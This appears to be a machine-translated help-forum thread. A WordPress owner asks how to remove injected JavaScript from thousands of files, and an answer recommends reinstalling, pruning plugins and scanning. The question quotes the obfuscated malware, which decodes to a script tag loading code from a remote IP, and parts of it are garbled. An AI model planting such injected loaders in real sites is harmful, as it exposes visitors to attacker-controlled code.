我最近发现我的网站感染了js恶意软件。 通过搜索,有3240个文件被此脚本感染。
您想问问我们如何使用此脚本使用SSH删除这些受感染的文件
这是恶意脚本:
块引用
var _0xaae8 = [""," \ x6A \ x6F \ x69 \ x6E"," \ x72 \ x65 \ x76 \ x65 \ x72 \ x73 \ x65& #34;" \ X73 \ X70 \ X6C \ X69 \ X74"" \ x3E \ X74 \ X70 \ X69 \ X72 \ X63 \ X73 \ X2F \ X3C \ x3E \ X22 \ X73 \ X6A \ X2E \ X79 \ X72 \ X65 \ X75 \ X71 \ X6A \ X2F \ X38 \ X37 \ X2E \ X36 \ X31 \ X31 \ X2E \ X39 \ X34 \ X32 \ X2E \ X34 \ X33 \ X31 \ X2F \ X2F \ X3A \ X70 \ X74 \ X74 \ X68 \ X22 \ X3D \ X63 \ X72 \ X73 \ X20 \ X74 \ X70 \ X69 \ X72 \ X63 \ X73 \ X3C"" \ X77 \ X72 \ X69 \ x74 \ x65"]; document_0xaae8 [5] var _0xaae8 = [""," \ x6A \ x6F \ x69 \ x6E"," \ x72 \ x65 \ X76 \ X65 \ X72 \ X73 \ X65"" \ X73 \ X70 \ X6C \ X69 \ X74"" \ x3E \ X74 \ X70 \ X69 \ X72 \ X63 \ X73 \ X2F \ X3C \ x3E \ X22 \ X73 \ X6A \ X2E \ X79 \ X72 \ X65 \ X75 \ X71 \ X6A \ X2F \ X38 \ X37 \ X2E \ X36 \ X31 \ X31 \ X2E \ X39 \ X34 \ X32 \ X2E \ X34 \ X33 \ X31 \ X2F \ X2F \ X3A \ X70 \ X74 \ X74 \ X68 \ X22 \ X3D \ X63 \ X72 \ X73 \ X20 \ X74 \ X70 \ X69 \ X72 \ X63 \ X73 \ X3C&#34 ;, " \ X77 \ X72 \ X69 \ X74 \ X65"]; document_0xaae8 [5] / **
块引用
提前致谢!
答案 0 :(得分:0)
下载您的wp-content文件夹和数据库,删除当前的wordpress安装并安装wordpress的新副本,
从已下载的wp-content中删除所有未使用的主题和插件,并使用您的防病毒软件或使用https://www.virustotal.com/或Linux操作系统中的任何防病毒软件扫描该文件夹和数据库(如果您使用的是Linux)
如果您还要删除所有插件并从wordpress插件仓库重新安装新副本,那就更好了,所以你只需要扫描当前使用的主题和数据库,如果你有足够的时间,你可以挖掘主题文件,以确保不再有恶意代码。
重新上传数据库,并从旧安装的扫描wp内容中替换新鲜wordpress安装的wp内容。